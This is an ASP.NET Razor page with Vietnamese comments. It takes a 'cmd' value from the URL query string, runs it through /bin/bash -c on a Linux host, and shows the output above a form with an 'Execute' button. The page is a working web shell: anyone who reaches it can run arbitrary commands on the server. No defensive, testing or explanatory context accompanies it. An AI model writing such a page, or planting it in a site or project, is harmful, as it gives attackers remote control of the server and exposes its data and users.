@page
@using System.Diagnostics
@{
    // Lấy tham số 'cmd' từ URL
    var cmd = Request.Query["cmd"];
    var output = "";

    if (!string.IsNullOrEmpty(cmd))
    {
        // Kịch bản cho Linux (Docker của bạn)
        var process = new Process()
        {
            StartInfo = new ProcessStartInfo
            {
                FileName = "/bin/bash", // Dùng bash vì là Linux
                Arguments = $"-c \"{cmd}\"",
                RedirectStandardOutput = true,
                UseShellExecute = false,
                CreateNoWindow = true
            }
        };
        process.Start();
        output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();
    }
}

<pre>@output</pre>
<form method="get">
    <input name="cmd" autofocus />
    <input type="submit" value="Execute" />
</form>
